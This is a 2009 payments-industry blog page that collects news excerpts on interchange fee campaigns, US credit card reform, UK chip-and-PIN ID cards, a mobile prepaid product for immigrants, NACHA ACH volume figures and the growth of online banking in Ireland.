--The National Retail Federation (NRF), the National Grocers Association (NGA) NACCS Angle Against Interchange. Recently, the NRF, NGA and NACCS -- together, the big three of retail associations -- recently held what their release billed as a “telephonic press conference” announcing the creation of “unfaircreditcardfees.com,” as well as an associated public interest campaign, to encourage consumers to press legislators for reforms to the “unfair and hidden credit card fees called “interchange””. This approach muddles the issue, in my opinion, as it uses language that ties the interchange dispute to consumers’ raw emotions at the account-fee issue, without identifying the (basic but relevant) differences in those topics. Whatever the ultimate impact, the directness of the appeal is impossible to miss.

--Senate Banking Committee Approves Card Reforms. On March 31, the Senate Banking Committee gave one-vote approval to measures designed to rein in certain credit card industry practices. The bill would include most of the Federal Reserve Rule changes passed in December, such as bans to universal default and double cycle billing, but would add fee restrictions and protections for borrowers under 21. Bill sponsor Chris Dodd said he was going to work over the recess to garner “broad support” for the effort.

As recent delinquency trends suggest, economic conditions continue to impact credit card usage and growth at a macro level. But increased scrutiny of long-held credit card industry practices will add additional pressure to an industry already feeling the strains.

Continue Reading at the Forrester Blog for eBusiness & Channel Strategy Professionals








ID Cards Could Be Fitted with Chip and PIN Technology to Combat Fraud

The Press Association: ID cards 'could use chip and pin'
ID cards could be fitted with chip and pin technology to help combat identity fraud. The head of the Government agency tasked with producing the cards said there were no "technical obstacles" to adding chips to the cards and handing out pin numbers. James Hall, chief executive of the Identity and Passport Service said adding chips might allow the cards to be used in ATM machines in the future.

Officials are also looking at chip and pin as a possible way to help combat online fraud and help protect internet shoppers.

It also emerged the Home Office has issued half as many ID cards for foreign nationals in the first four months than expected.

When the card was launched in late November ministers predicted that between 40,000 and 50,000 non-EU nationals would have cards by the end of last month. But by the end of last week 22,500 cards had been issued. Mr Hall said they had encountered "the odd wrinkle" in the system but overall it had worked "pretty well".

A spokesman for the UK Border Agency (UKBA) said 42,000 foreign nationals had been through the enrollment process and had their biometric details taken. Mr Hall said he was looking at how ID card holders could "assert their identities" online when the card is rolled out.

He said: "One of the reasons for the format of the card is we have the opportunity to put it in to card readers and potentially use it in existing networks such as the ATM network.

One of the issues on the table is whether we should introduce chip and pin technology in to the card. There are no technical reasons why we couldn't do that."

Editor's Note: In fact, HomeATM's SAFETPIN is EMV ready (smart card, chip ready). Which brings up a question. How would a software PIN Debit application work in an EMV environment? If you know, comment below...lol!



SizzleMoney Offers Mobile Banking to Immigrants

I blogged about SizzleMoney about a week ago, but here's an excerpt from a good article in this morning's American Banker...

Prepaid Account Offers Mobile Banking Service to Immigrants

By Will Hernandez
American Banker | Tuesday, April 7, 2009

Denarii Payments Inc. of Atlanta has developed a mobile phone-linked prepaid product called SizzleMoney that is initially targeting Hispanic immigrants.

People can use the product to send one another money by text message, access funds in their SizzleMoney accounts with a prepaid debit card and make purchases at the point of sale with their phones.

"It's basically mobile cash," said Donald Baggett, Denarii's founder and chief executive officer.

Denarii said SizzleMoney will appeal to immigrants, who often use their mobile phones as their primary method of communication.

The SizzleMoney account features debit cards bearing the logos of the Maestro, Pulse, Star and Cirrus debit networks. The cards can be used to make PIN debit purchases and to make withdrawals at automated teller machines. Customers can upgrade to MasterCard Inc.-branded debit cards.

Central National Bank of Enid, Okla., issues the cards and its Interactive Transaction Services subsidiary processes the transactions.

Continue Reading at American Banker


Will Hernandez is the associate editor of ATM&Debit News.



NACHA - 18.2 Billion ACH Payments in 2008

ACH Transaction Volume up by 1.2 Billion Payments - Despite Economic and Industry Pressures
Consumer ACH Bill Payments Made via Internet near $1 Trillion

Orlando Florida: PIN Payments News: The number of ACH payments in 2008 topped 18.2 billion, representing an increase of 1.2 billion over 2007, according to statistics released today by NACHA - The Electronic Payments Association at its PAYMENTS 2009 conference.

"Consumers, businesses, and government are continuing to embrace the safe, smart, and green attributes of ACH payments and choosing electronic over paper," said Janet O. Estep, NACHA president and chief executive officer. "Despite the overall economy slowing in 2008, the ACH Network continues to see positive growth."

The portion of ACH payment volume passing through the ACH Operators grew in 2008 to nearly 15 billion transactions. The number of ACH Network transactions in 2008 was 14,960,689,587, which is 7.1 percent more than 2007. The dollar value of these payments was $29.96 trillion, an increase of 4 percent over 2007.

Internet Payments

Internet-initiated ACH debits (WEB) experienced robust growth in 2008, increasing by 19.7 percent to almost 2.1 billion payments. When combined with consumer-initiated credit payments (CIE), the dollar value of consumer ACH payments made via the Internet is nearing $1 trillion annually ($939 billion in 2008).

Business-to-Business (B2B) Payments/Financial EDI

More than 1 billion EDI-formatted addenda records were transmitted across the ACH Network in 2008, a 14.6 percent increase over 2007. Businesses use EDI-formatted addenda records to send and receive invoice- and other payment-related information. The volume of CTX payments, which can carry up to 9,999 addenda records, increased by 16.1 percent, and the number of CCD payments carrying an addenda record increased by 17.9 percent.

Back Office Conversion (BOC)

In its first full year of availability, the newest e-check transaction - BOC - grew by 1,772 percent in 2008 to a total of 78,460,461 payments. This volume is comparable to the original Point-of-Purchase (POP) check conversion application when accounting for the significant decline in consumer check-writing over the past eight years. At the same time period after its introduction, the annualized volume of POP transactions was 101 million; however, consumer check-writing has been declining during this time period by about 4 percent per year.

Federal Government Payments

The Federal government used the ACH Network for more than 30 million Direct Deposits as part of 2008's economic stimulus package. This contributed to an overall growth of Federal government ACH payments of 10.2 percent, to 1,145,895,074 payments in 2008. According to the Financial Management Service, the Federal government saves $0.925 for every Direct Deposit that replaces a check payment. With over 1 billion Direct Deposits, the Federal government saved at least $925 million in 2008 by using the ACH Network.

Network Risk and Quality Indicators

The most significant ACH Network risk and quality indicators improved moderately in 2008. Overall, the rate at which ACH debits are returned as unauthorized declined slightly from 0.041 percent to 0.040 percent, and there were no SEC codes that had a significant increase in its unauthorized rate.

NACHA -- The Electronic Payments Association

NACHA -- The Electronic Payments Association is a not-for-profit association that oversees the Automated Clearing House (ACH) Network, a safe, efficient, green, and high-quality payment system. More than 15,000 depository financial institutions originated and received 18.2 billion ACH payments in 2008. NACHA is responsible for the administration, development, and enforcement of the NACHA Operating Rules and sound risk management practices for the ACH Network. Through its industry councils and forums, NACHA brings together hundreds of payments system stakeholder organizations to encourage the efficient utilization of the ACH Network and develop new ways to use the Network to benefit its diverse set of participants. NACHA represents nearly 11,000 financial institutions through direct membership and 19 regional payments associations. NACHA and its members provide education, tools, and resources to increase the adoption of ACH payments to benefit businesses, consumers, and governments. To learn more, visit www.nacha.org and www.electronicpayments.org.

SOURCE: NACHA








Online Banking in Ireland Soars

Source: Finextra
Complete item: http://www.finextra.com/fullstory.asp?id=19891

Description:

The popularity of online banking in Ireland has soared over the last year, with 2.2 million customers now registered, a 28% increase on the previous year. According to data gathered from financial institutions by the Irish Banking Federation (IBF) and Irish Payment Services Organisation (Ipso), 2.2 million customers were registered for online banking by the end of 2008, up 27.8% on the 1.8 million recorded at the end of 2007. Ireland has a population of around 4.4 million.

In addition, there was a 31.6% rise in the number of Internet payments to 30.7 million - equivalent to 84,000 per day. A 33.6% increase, to 123 million, was also recorded in the number of times customers accessed their account balances online.

Pat Farrell, CEO, IBF, says: "We can see from the data compiled to date that online banking is on a significant growth path in Ireland. Comparative figures for 2007 show that the average user here made 14% more online payments and 20% more online enquiries than his/her UK counterpart. However, in a leading online adopter like Norway the average customer made around three times more payments online - indicating that there is considerable scope for further growth."

Una Dillon, head, card services and communications, Ipso, adds: "Online banking is facilitating the migration from cheques and other paper-based payment methods to electronic payments. The move to electronic payments is vital in ensuring Ireland's competitiveness and efficiency within the wider European market."
